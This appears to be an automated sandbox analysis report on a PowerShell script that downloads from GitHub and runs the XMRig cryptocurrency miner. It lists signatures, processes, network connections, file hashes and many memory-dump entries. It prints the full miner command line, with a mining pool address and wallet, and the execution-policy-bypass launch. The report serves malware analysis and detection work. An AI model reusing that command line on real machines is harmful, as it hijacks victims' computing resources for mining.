memory/3844-113-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-114-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-115-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-116-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-117-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-118-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-119-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-120-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-121-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-122-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-123-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-124-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-125-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-126-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-127-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-128-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-129-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-130-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-131-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-132-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-133-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-134-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-135-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-136-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-137-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-138-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-139-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-140-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-141-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-142-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-143-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-144-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-145-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-146-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-147-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-148-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-149-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-150-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-151-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-152-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-153-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-154-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-155-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-156-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:13

Platform

win11-20240508-en

Max time kernel

1799s

Max time network

1772s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/4800-0-0x00007FFE25133000-0x00007FFE25135000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_peaw5jpr.10k.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4800-9-0x0000021EA23D0000-0x0000021EA23F2000-memory.dmp

memory/4800-10-0x00007FFE25130000-0x00007FFE25BF2000-memory.dmp

memory/4800-11-0x00007FFE25130000-0x00007FFE25BF2000-memory.dmp

memory/4800-12-0x00007FFE25130000-0x00007FFE25BF2000-memory.dmp

memory/4800-14-0x0000021EA2480000-0x0000021EA2492000-memory.dmp

memory/4800-15-0x0000021EA2460000-0x0000021EA246A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/836-46-0x00000110E07C0000-0x00000110E07E0000-memory.dmp

memory/836-47-0x0000011174730000-0x0000011174750000-memory.dmp

memory/836-48-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/4800-49-0x00007FFE25133000-0x00007FFE25135000-memory.dmp

memory/4800-50-0x00007FFE25130000-0x00007FFE25BF2000-memory.dmp

memory/836-52-0x0000011174DA0000-0x0000011174DC0000-memory.dmp

memory/836-51-0x0000011174D80000-0x0000011174DA0000-memory.dmp

memory/836-53-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-54-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-55-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-57-0x0000011174DA0000-0x0000011174DC0000-memory.dmp

memory/836-56-0x0000011174D80000-0x0000011174DA0000-memory.dmp

memory/836-58-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-59-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-60-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-61-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-62-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-63-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-64-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-65-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-66-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-67-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-68-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-69-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-70-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-71-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-72-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-73-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-74-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-75-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-76-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-77-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-78-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-79-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-80-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-81-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-82-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-83-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-84-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-85-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-86-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-87-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-88-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-89-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-90-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-91-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-92-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-93-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-94-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-95-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-96-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-97-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-98-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-99-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-100-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-101-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-102-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-103-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-104-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-105-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-106-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-107-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-108-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-109-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-110-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-111-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-112-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-113-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-114-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-115-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp

memory/836-116-0x00007FF7DF470000-0x00007FF7E00A3000-memory.dmp